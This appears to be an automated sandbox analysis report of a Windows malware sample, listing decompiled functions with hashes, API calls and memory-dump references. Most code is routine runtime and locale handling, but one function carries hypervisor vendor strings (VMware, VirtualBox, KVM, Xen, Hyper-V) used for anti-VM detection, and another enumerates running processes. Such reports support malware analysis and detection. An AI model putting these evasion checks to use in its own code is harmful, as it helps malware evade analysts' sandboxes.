Opcode ID: bc87c6a911c037e071e0b4d2b88beba681bff3a77ab01ebaaeb9ff7d1878ad3f
Instruction ID: 76ab1cc204ad277cf790a4266ca1458fd6aa7a5997ee1d172ca83afbd5284663
Opcode Fuzzy Hash: bc87c6a911c037e071e0b4d2b88beba681bff3a77ab01ebaaeb9ff7d1878ad3f
Instruction Fuzzy Hash: 35E0ECF0D007049FCF20EF7A840161ABEF1BF04704B00893FA5A6C7701D7789A008BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004BB397, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 004BB3D5

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 2c10468269b1ab8e19733710d797b50e8ae4661bc8e6b0d63e18906ef6ddf239
Instruction ID: 08115e15f90c600a55345117ea14690c9b3b8fa16ddf1c0c17d1e15c734de36c
Opcode Fuzzy Hash: 2c10468269b1ab8e19733710d797b50e8ae4661bc8e6b0d63e18906ef6ddf239
Instruction Fuzzy Hash: 9D11367190420AAFCB05DF59E9409DB7BF8EF48304F00406AFC08AB312D671E9218BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004A9E0D, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8677afb4cdaecb1433d7731f8887c1c495c32bfa64a06d6d25baffb49828167b
Instruction ID: f6d9c7aabced4142f7750d5c23595e27225db8add3f0b2e21cef285754c30188
Opcode Fuzzy Hash: 8677afb4cdaecb1433d7731f8887c1c495c32bfa64a06d6d25baffb49828167b
Instruction Fuzzy Hash: 54F0F472900A1056CA317A7B9C01A9B32988FB3378F10471BF421962C3CB7C9C0286BF

Uniqueness

Uniqueness Score: -1.00%

Function 004B1B82, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 004B2F72: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004B3649,00000001,00000364,?,004AADF3,004E8890,00000010), ref: 004B2FB3

_free.LIBCMT ref: 004B1BA2

Part of subcall function 004B2FCF: RtlFreeHeap.NTDLL(00000000,00000000,?,004BD54B,?,00000000,?,00000000,?,004BD7EF,?,00000007,?,?,004BDBE3,?), ref: 004B2FE5
Part of subcall function 004B2FCF: GetLastError.KERNEL32(?,?,004BD54B,?,00000000,?,00000000,?,004BD7EF,?,00000007,?,?,004BDBE3,?,?), ref: 004B2FF7

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: 48e3e2c54d13805096218aa5b7e39bb9a52bbc855e06a66c9bcf5259d47b0e79
Instruction ID: 3590d8b69831cb7f3e5c2e1d6d2ade56b024a762c023daca3ca033137ecf6d53
Opcode Fuzzy Hash: 48e3e2c54d13805096218aa5b7e39bb9a52bbc855e06a66c9bcf5259d47b0e79
Instruction Fuzzy Hash: 66F03C71A04209AFC310DF69C542B9AB7F4FB48710F10416BE918E7341E775AA108BE5

Uniqueness

Uniqueness Score: -1.00%

Function 004B2F72, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004B3649,00000001,00000364,?,004AADF3,004E8890,00000010), ref: 004B2FB3

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ca23d797807c8c1653de12cb30f492c3cd3c2327c1761bc63c89d39908bb7947
Instruction ID: 814e874a66a304bc54667ad23078e37bb06c9f8517dff74dbc2af21a5f255a83
Opcode Fuzzy Hash: ca23d797807c8c1653de12cb30f492c3cd3c2327c1761bc63c89d39908bb7947
Instruction Fuzzy Hash: 1DF0E9316041216BDB216A629E09FFB7778AF51760B144223FC04DB388CBB8DC01A2FC

Uniqueness

Uniqueness Score: -1.00%

Function 004C1FE0, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004C2021

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 46cbe1521d11c4f8aa15e3888fe767836981a3dd4acc9b8ad7fb78b9a918fd65
Instruction ID: 3640a560bbb497f6f1a3e858b0da2481f43d17f82925ea2d86ee18bea973f33e
Opcode Fuzzy Hash: 46cbe1521d11c4f8aa15e3888fe767836981a3dd4acc9b8ad7fb78b9a918fd65
Instruction Fuzzy Hash: 9AF09A3A410009BBCF115E9ADD01DEF7B69EF89324F10011BFE1492050DABACA21E7A4

Uniqueness

Uniqueness Score: -1.00%

Function 004B84D4, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 004B3009: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004BAEA8,00000000,?,004AB16D,?,00000008,?,004AD0C1,?,?,00000000), ref: 004B303B

_free.LIBCMT ref: 004B84F4

Part of subcall function 004B2FCF: RtlFreeHeap.NTDLL(00000000,00000000,?,004BD54B,?,00000000,?,00000000,?,004BD7EF,?,00000007,?,?,004BDBE3,?), ref: 004B2FE5
Part of subcall function 004B2FCF: GetLastError.KERNEL32(?,?,004BD54B,?,00000000,?,00000000,?,004BD7EF,?,00000007,?,?,004BDBE3,?,?), ref: 004B2FF7

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: e3597f89f24ceafffc4df9fc21f554d6393e83129595a89f945b109acdbceb5d
Instruction ID: f086f7f719bda3272919297820ab0dff29b2ae4f68269dccc13757d2b61e3206
Opcode Fuzzy Hash: e3597f89f24ceafffc4df9fc21f554d6393e83129595a89f945b109acdbceb5d
Instruction Fuzzy Hash: 6AF062710057049FD7349F11D841792B7FCEF04715F10842FE29A8B691DB78B544CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004B3009, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004BAEA8,00000000,?,004AB16D,?,00000008,?,004AD0C1,?,?,00000000), ref: 004B303B

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: deed60d1610bc0232ec50c4714b6350813f53c1a698db842715f9ecf29e5d884
Instruction ID: 8d747d84a442c24b64d8b1a2952e442fc8bda9735a41b62449694b540e0bbcff
Opcode Fuzzy Hash: deed60d1610bc0232ec50c4714b6350813f53c1a698db842715f9ecf29e5d884
Instruction Fuzzy Hash: 67E0ED252402215BEB323E2B9C05BEB3A5C9F42BA2F110123FC559628ACB6CDE0181FD

Uniqueness

Uniqueness Score: -1.00%

Function 0042CE52, Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0042CE69

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: dbc42efef067eca205d12d162b20e86befcd95f1def56f6450c93a1d100501b7
Instruction ID: 2eb0282fe1c6891d17d58e664d170d25e2802814794deabebe1e5b6a43b387f4
Opcode Fuzzy Hash: dbc42efef067eca205d12d162b20e86befcd95f1def56f6450c93a1d100501b7
Instruction Fuzzy Hash: 4AD05B323051116BD3046619D4057BAA79EAFD5325F05011FF14087181DBF46C5543F5

Uniqueness

Uniqueness Score: -1.00%

Function 004C1D1F, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,004C20FA,?,?,00000000,?,004C20FA,00000000,0000000C), ref: 004C1D3C

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8c0ace9f6479a9408fd5a04cf5319de070908fcdbb9995ed9a71c7c87d315486
Instruction ID: 77a87769d2922ab1aa08fa2c4765cde3081cc8ea7699ff4b09f262fb826255c5
Opcode Fuzzy Hash: 8c0ace9f6479a9408fd5a04cf5319de070908fcdbb9995ed9a71c7c87d315486
Instruction Fuzzy Hash: 35D06C3200010DBFDF128F84ED06EDA3BAAFB88714F014010BA1896021C732E831EB94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004BED95, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E004BED95(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, short* _a8, char _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int* _v24;
				short* _v28;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed int* _t46;
				signed int _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed int _t105;
				signed short _t108;
				signed int _t109;
				void* _t110;

				_t39 =  *0x4eb018; // 0xa3bb88a6
				_v8 = _t39 ^ _t109;
				_t3 =  &_a12; // 0x4b2178
				_t89 =  *_t3;
				_t105 = _a4;
				_v28 = _a8;
				_v24 = E004B361B(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E004B361B(_t89, __ecx, __edx);
				_t8 =  &_v20; // 0x4b2178
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) = _t8;
				_t92 = _t105 + 0x80;
				_t46 = _v24;
				 *_t46 = _t105;
				_t102 =  &(_t46[1]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x4086d4; // 0x17
					E004BED38(0, 0x4085c0, _t85 - 1, _t102);
					_t46 = _v24;
					_t110 = _t110 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					_t21 =  &_v20; // 0x4b2178
					E004BE6D5(_t92, _t99, _t21);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						_t16 =  &_v20; // 0x4b2178
						E004BE7BB(_t92, _t99, _t16);
					} else {
						_t15 =  &_v20; // 0x4b2178
						E004BE720(_t92, _t99, _t15);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x4085bc; // 0x41
						_t77 = E004BED38(_t99, "Dy@", _t75 - 1, _v24);
						_t110 = _t110 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t108 = E004BEBC1(_t92,  ~_t105 & _t105 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t108;
								if(_t108 == 0) {
									goto L22;
								}
								__eflags = _t108 - 0xfde8;
								if(_t108 == 0xfde8) {
									goto L22;
								}
								__eflags = _t108 - 0xfde9;
								if(_t108 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t108 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t108;
								}
								E004B7C16(_t89, _t94, _t99, _t103, _t108, __eflags, _v16,  &(_v24[0x94]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return E0049CE1D(_v8 ^ _t109);
								}
								E004B7C16(_t89, _t94, _t99, _t103, _t108, __eflags, _v16,  &(_t89[0x90]), 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t68 = GetLocaleInfoW(_v12, 0x1002,  &(_t89[0x40]), 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								E004C2A00( &(_t89[0x80]), _t108,  &(_t89[0x80]), 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							E004BE7BB(_t92, _t99,  &_v20);
						} else {
							E004BE720(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}

0x004bed9d
0x004beda4
0x004bedab
0x004bedab
0x004bedaf
0x004bedb3
0x004bedc1
0x004bedc6
0x004bedc7
0x004bedc8
0x004bedc9
0x004bedce
0x004bedd1
0x004bedd3
0x004bedd9
0x004beddf
0x004bede2
0x004bede4
0x004bede7
0x004bedeb
0x004bedf2
0x004bedff
0x004bee04
0x004bee07
0x004bee0a
0x004bee0a
0x004bee0c
0x004bee0f
0x004bee13
0x004bee83
0x004bee85
0x004bee87
0x004bee9a
0x004bee9a
0x004beea1
0x004beea7
0x004beeaa
0x00000000
0x004beeaa
0x004bee89
0x004bee8c
0x00000000
0x00000000
0x004bee8e
0x004bee92
0x004bee97
0x00000000
0x004bee1a
0x004bee1a
0x004bee1e
0x004bee30
0x004bee34
0x004bee25
0x004bee25
0x004bee29
0x004bee29
0x004bee3d
0x004bee3e
0x004beec8
0x004beec8
0x00000000
0x004bee44
0x004bee44
0x004bee53
0x004bee58
0x004bee5d
0x004beead
0x004beead
0x004beead
0x004beeaf
0x004beeb3
0x004beeca
0x004beed6
0x004beee0
0x004beee3
0x004beee4
0x004beee6
0x00000000
0x00000000
0x004beee8
0x004beeee
0x00000000
0x00000000
0x004beef0
0x004beef6
0x00000000
0x00000000
0x004beefc
0x004bef02
0x004bef04
0x00000000
0x00000000
0x004bef0b
0x004bef11
0x004bef13
0x00000000
0x00000000
0x004bef15
0x004bef18
0x004bef1a
0x004bef1c
0x004bef1c
0x004bef2d
0x004bef32
0x004bef34
0x004bef94
0x004beeb7
0x004beec7
0x004beec7
0x004bef43
0x004bef53
0x004bef59
0x004bef5b
0x00000000
0x00000000
0x004bef72
0x004bef78
0x004bef7a
0x00000000
0x00000000
0x004bef8c
0x00000000
0x004bef91
0x004beeb5
0x00000000
0x004beeb5
0x004bee5f
0x004bee61
0x004bee65
0x004bee7b
0x004bee6c
0x004bee70
0x004bee70
0x004bee80
0x00000000
0x004bee80
0x004bee3e

APIs

Part of subcall function 004B361B: GetLastError.KERNEL32(?,?,004AADF3,004E8890,00000010), ref: 004B361F
Part of subcall function 004B361B: _free.LIBCMT ref: 004B3652
Part of subcall function 004B361B: SetLastError.KERNEL32(00000000), ref: 004B3693

Part of subcall function 004B361B: _free.LIBCMT ref: 004B367A
Part of subcall function 004B361B: SetLastError.KERNEL32(00000000), ref: 004B3687

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004BEEA1
IsValidCodePage.KERNEL32(00000000), ref: 004BEEFC
IsValidLocale.KERNEL32(?,00000001), ref: 004BEF0B
GetLocaleInfoW.KERNEL32(?,00001001,x!K,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004BEF53
GetLocaleInfoW.KERNEL32(?,00001002,00000004,00000040), ref: 004BEF72

Strings

Dy@, xrefs: 004BEE4E
x!K, xrefs: 004BEDBE, 004BEDCE, 004BEE8E, 004BEE30, 004BEE25, 004BEE28, 004BEE33, 004BEE91
x!K, xrefs: 004BEECA, 004BEE77, 004BEE6C
x!K, xrefs: 004BEDAB, 004BEF4A

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID: Dy@$x!K$x!K$x!K
API String ID: 2287132625-2485495555
Opcode ID: 0703e825d3355c94fbe516a49595de9cf4fc7b439f82bbbb0de182b9e86bf367
Instruction ID: 570cd642959635f4e5891eb4fd980155a5b5b7b058a09a90161b670c5094ec4e
Opcode Fuzzy Hash: 0703e825d3355c94fbe516a49595de9cf4fc7b439f82bbbb0de182b9e86bf367
Instruction Fuzzy Hash: 22518171900205ABEF20DFA7CC85AFB77B9AF94700F04446AE915E7291DB78D904CB79

Uniqueness

Uniqueness Score: -1.00%

Function 004BEBC1, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E004BEBC1(void* __ecx, signed int _a4, char _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t11 =  &_a8; // 0x4beee0
					if(GetLocaleInfoW( *( *_t11 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x4086d8;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x4086e0;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E004AC294(_t23, _t23);
									goto L25;
								}
								_t7 =  &_a8; // 0x4beee0
								if(GetLocaleInfoW( *( *_t7 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x004bebc6
0x004bebc7
0x004bebce
0x004bec72
0x004bec78
0x004bec8b
0x004bec91
0x004bec96
0x004bec98
0x004bec98
0x004bec9e
0x004beca3
0x004beca3
0x004bec8d
0x004bec8d
0x00000000
0x004bec8d
0x004bebd4
0x004bebd9
0x00000000
0x00000000
0x004bebdf
0x004bebe4
0x004bebe6
0x004bebe6
0x004bebec
0x00000000
0x00000000
0x004bebf1
0x004bec08
0x004bec08
0x004bec11
0x004bec13
0x00000000
0x00000000
0x004bec15
0x004bec1a
0x004bec1c
0x004bec1c
0x004bec22
0x00000000
0x00000000
0x004bec27
0x004bec45
0x004bec47
0x004bec6a
0x00000000
0x004bec6f
0x004bec4f
0x004bec62
0x00000000
0x00000000
0x004bec64
0x00000000
0x004bec64
0x004bec29
0x004bec31
0x00000000
0x00000000
0x004bec33
0x004bec36
0x004bec3c
0x00000000
0x00000000
0x00000000
0x004bec3e
0x004bec40
0x004bec42
0x00000000
0x004bec42
0x004bebf3
0x004bebfb
0x00000000
0x00000000
0x004bebfd
0x004bec00
0x004bec06
0x00000000
0x00000000
0x00000000
0x004bec06
0x004bec0c
0x004bec0e
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,004BEEE0,?,00000000), ref: 004BEC5A
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,004BEEE0,?,00000000), ref: 004BEC83
GetACP.KERNEL32(?,?,004BEEE0,?,00000000), ref: 004BEC98

Strings

OCP, xrefs: 004BEC15
ACP, xrefs: 004BEBDF
K, xrefs: 004BEC78, 004BEC4F

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP$K
API String ID: 2299586839-2998780331
Opcode ID: 03d3a8f85c6b01393fe55cf7a9934f62bff3bd0a925bf86211750f47d8cd5127
Instruction ID: 5ca76ffc91858fd917c39bf6adef54c2dec64c83fd596529cd9053c03d2dd680
Opcode Fuzzy Hash: 03d3a8f85c6b01393fe55cf7a9934f62bff3bd0a925bf86211750f47d8cd5127
Instruction Fuzzy Hash: 6A212836600100AAD7348F26CA04AE77FB6AFE0B50B568466E90AD7301E73BDD41C378

Uniqueness

Uniqueness Score: -1.00%

Function 00446B77, Relevance: 9.1, APIs: 6, Instructions: 64
processCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00446B77(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v560;
				void* _v564;
				void* __ebp;
				signed int _t10;
				struct tagPROCESSENTRY32W* _t18;
				void* _t29;
				intOrPtr* _t36;
				signed int _t39;

				_t10 =  *0x4eb018; // 0xa3bb88a6
				_v8 = _t10 ^ _t39;
				_t36 = __ecx;
				E00482C3F(__ecx,  *__ecx);
				 *((intOrPtr*)( *__ecx)) =  *__ecx;
				 *((intOrPtr*)( *__ecx + 4)) =  *__ecx;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				_t29 = CreateToolhelp32Snapshot(2, 0);
				if(_t29 != 0xffffffff) {
					E0049FB10(_t36,  &_v560, 0, 0x228);
					_v564 = 0x22c;
					_t18 =  &_v564;
					Process32FirstW(_t29, _t18);
					__eflags = _t18;
					if(__eflags == 0) {
						GetLastError();
					} else {
						do {
							_push( &_v564);
							_push( *_t36);
							E00482C63(_t36, _t36, 0, __eflags);
							__eflags = Process32NextW(_t29,  &_v564);
						} while (__eflags != 0);
					}
					CloseHandle(_t29);
				} else {
					GetLastError();
				}
				return E0049CE1D(_v8 ^ _t39);
			}

0x00446b80
0x00446b87
0x00446b8d
0x00446b93
0x00446b9d
0x00446ba1
0x00446ba4
0x00446bad
0x00446bb2
0x00446bc9
0x00446bd1
0x00446bdb
0x00446be3
0x00446be9
0x00446beb
0x00446c11
0x00446bed
0x00446bed
0x00446bf5
0x00446bf6
0x00446bf8
0x00446c0b
0x00446c0b
0x00446c0f
0x00446c1a
0x00446bb4
0x00446bb4
0x00446bb4
0x00446c30

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00446BA7
GetLastError.KERNEL32 ref: 00446BB4
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00446BE3
Process32NextW.KERNEL32(00000000,0000022C), ref: 00446C05
CloseHandle.KERNEL32(00000000), ref: 00446C1A

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Process32$CloseCreateErrorFirstHandleLastNextSnapshotToolhelp32
String ID:
API String ID: 2065776320-0
Opcode ID: 3907c088bc786b5f3a3e60a00515d035d2b5f57b828a3ebbde1cab34de4b0795
Instruction ID: caebbb575f0a62139c1f9c7cf2129debbac19428c654addac2487947c739b1ed
Opcode Fuzzy Hash: 3907c088bc786b5f3a3e60a00515d035d2b5f57b828a3ebbde1cab34de4b0795
Instruction Fuzzy Hash: 3E117F70600218AFE710EF75ECC8AAABBACEF48314F10056AE505C7251DB799E04CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004BE45D, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 004B361B: GetLastError.KERNEL32(?,?,004AADF3,004E8890,00000010), ref: 004B361F
Part of subcall function 004B361B: _free.LIBCMT ref: 004B3652
Part of subcall function 004B361B: SetLastError.KERNEL32(00000000), ref: 004B3693

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004B217F,?,?,?,?,004B1BD6,?,00000006), ref: 004BE53F
_wcschr.LIBVCRUNTIME ref: 004BE5CF
_wcschr.LIBVCRUNTIME ref: 004BE5DD
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004B217F,00000000,004B229F), ref: 004BE680

Strings

Dy@, xrefs: 004BE4D0

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID: Dy@
API String ID: 2444527052-15957793
Opcode ID: debdb2c0d7586ea4a89d7033b72f6ab7402c9bf7c9316b958dc693d8f1734bcf
Instruction ID: 8b77ecb800fa38c15b9be58a4435142daaa5de86a45f9f3841541293fb08b5ea
Opcode Fuzzy Hash: debdb2c0d7586ea4a89d7033b72f6ab7402c9bf7c9316b958dc693d8f1734bcf
Instruction Fuzzy Hash: E9611871600606AAD725AB37CC42BEB73A8EF94714F10046FF905DB281FB78E95187B9

Uniqueness

Uniqueness Score: -1.00%

Function 00438696, Relevance: 7.6, Strings: 6, Instructions: 67COMMON

Download Yara Rule

Strings

VBoxVBoxVBox, xrefs: 004386F4
Microsoft Hv, xrefs: 004386C5
VMwareVMware, xrefs: 004386DF
prl hyperv , xrefs: 004386ED
KVMKVMKVM, xrefs: 004386B9
XenVMMXenVMM, xrefs: 004386E6

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID: KVMKVMKVM$Microsoft Hv$VBoxVBoxVBox$VMwareVMware$XenVMMXenVMM$prl hyperv
API String ID: 626452242-642888547
Opcode ID: 993487a36ee2dca65cd00738d82c7374a501bfd2630f613d6f3d7073e2afcf8d
Instruction ID: 2c8174c4dc435a945022d74faaa771820768a3d757ee15a78210c07fce50f33d
Opcode Fuzzy Hash: 993487a36ee2dca65cd00738d82c7374a501bfd2630f613d6f3d7073e2afcf8d
Instruction Fuzzy Hash: A9218471E003489ADB10DFE5CD859DEB7F8AF44304F10853EE516AB215EB78A949CB48

Uniqueness

Uniqueness Score: -1.00%

Function 004BE720, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 004B361B: GetLastError.KERNEL32(?,?,004AADF3,004E8890,00000010), ref: 004B361F
Part of subcall function 004B361B: _free.LIBCMT ref: 004B3652
Part of subcall function 004B361B: SetLastError.KERNEL32(00000000), ref: 004B3693

EnumSystemLocalesW.KERNEL32(004BE848,00000001,00000000,?,x!K,?,004BEE75,00000000,?,?,?), ref: 004BE792

Strings

uK, xrefs: 004BE767
x!K, xrefs: 004BE725

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID: uK$x!K
